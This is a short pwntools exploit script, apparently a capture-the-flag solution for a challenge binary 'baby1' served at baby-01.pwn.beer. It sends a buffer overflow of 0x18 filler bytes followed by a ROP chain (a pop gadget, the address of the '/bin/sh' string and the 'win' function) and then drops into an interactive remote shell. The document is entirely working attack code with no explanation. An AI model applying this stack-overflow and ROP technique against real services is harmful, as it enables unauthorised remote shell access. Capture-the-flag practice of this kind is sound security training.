1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19
| from pwn import *
r = remote('baby-01.pwn.beer', 10001) e = ELF('./baby1') binsh = e.search("/bin/sh").next() pr = 0x0000000000400793
ru = lambda a: r.recvuntil(a) sl = lambda a: r.sendline(a) sla = lambda a, b: r.sendlineafter(a, b) ex = lambda : r.interactive()
p = "A"*0x18 p += p64(pr) p += p64(binsh) p += p64(e.symbols['win']) sl(p) ru("input: ") ex();
|